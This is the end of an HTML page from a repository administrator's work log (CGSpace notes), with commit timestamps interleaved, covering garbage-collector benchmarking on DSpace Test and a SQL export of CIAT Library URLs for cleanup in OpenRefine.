< h2 id = "2022-03-31" > 2022-03-31< / h2 >
2022-04-26 08:47:01 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC< / li >
< li > I will do the following for CMS and G1GC on DSpace Test:
2022-04-26 08:47:01 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > Wait for startup< / li >
< li > Reload home page< / li >
< li > Log in< / li >
< li > Do a search for “ livestock” < / li >
< li > Click AGROVOC facet for livestock< / li >
< li > dspace index-discovery -b< / li >
< li > dspace-statistics-api index< / li >
2022-04-26 08:47:01 +02:00
< / ul >
< / li >
2022-04-27 08:58:45 +02:00
< li > With CMS the Discovery Index took:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > real 379m19.245s
< / span > < / span > < span style = "display:flex;" > < span > user 267m17.704s
< / span > < / span > < span style = "display:flex;" > < span > sys 4m2.937s
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
2022-04-26 08:47:01 +02:00
< ul >
2022-04-27 08:58:45 +02:00
< li > I extracted a list of URLs from CGSpace to send him:< / li >
2022-04-26 08:47:01 +02:00
< / ul >
< / li >
< / ul >
2022-04-27 08:58:45 +02:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ ' https?://ciat-library' ) to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
< / span > < / span > < span style = "display:flex;" > < span > COPY 4552
2022-04-26 08:47:01 +02:00
< / span > < / span > < / code > < / pre > < / div > < ul >
2022-04-27 08:58:45 +02:00
< li > I did some checks and cleanups in OpenRefine because there are some values with “ #page” etc
< ul >
< li > Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs< / li >
< li > I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books< / li >
< / ul >
< / li >
2022-04-26 08:47:01 +02:00
< / ul >
2022-03-13 20:08:57 +01:00
<!-- raw HTML omitted -->
2022-03-01 15:48:40 +01:00
< / article >
< / div > <!-- /.blog - main -->
< aside class = "col-sm-3 ml-auto blog-sidebar" >
< section class = "sidebar-module" >
< h4 > Recent Posts< / h4 >
< ol class = "list-unstyled" >
2023-03-01 06:30:25 +01:00
< li > < a href = "/cgspace-notes/2023-03/" > March, 2023< / a > < / li >
2023-02-09 06:50:54 +01:00
< li > < a href = "/cgspace-notes/2023-02/" > February, 2023< / a > < / li >
2023-01-01 09:12:13 +01:00
< li > < a href = "/cgspace-notes/2023-01/" > January, 2023< / a > < / li >
2022-12-03 08:46:29 +01:00
< li > < a href = "/cgspace-notes/2022-12/" > December, 2022< / a > < / li >
2022-11-01 20:12:24 +01:00
< li > < a href = "/cgspace-notes/2022-11/" > November, 2022< / a > < / li >
2022-03-01 15:48:40 +01:00
< / ol >
< / section >
< section class = "sidebar-module" >
< h4 > Links< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "https://cgspace.cgiar.org" > CGSpace< / a > < / li >
< li > < a href = "https://dspacetest.cgiar.org" > DSpace Test< / a > < / li >
< li > < a href = "https://github.com/ilri/DSpace" > CGSpace @ GitHub< / a > < / li >
< / ol >
< / section >
< / aside >
< / div > <!-- /.row -->
< / div > <!-- /.container -->
< footer class = "blog-footer" >
< p dir = "auto" >
Blog template created by < a href = "https://twitter.com/mdo" > @mdo< / a > , ported to Hugo by < a href = 'https://twitter.com/mralanorth' > @mralanorth< / a > .
< / p >
< p >
< a href = "#" > Back to top< / a >
< / p >
< / footer >
< / body >
< / html >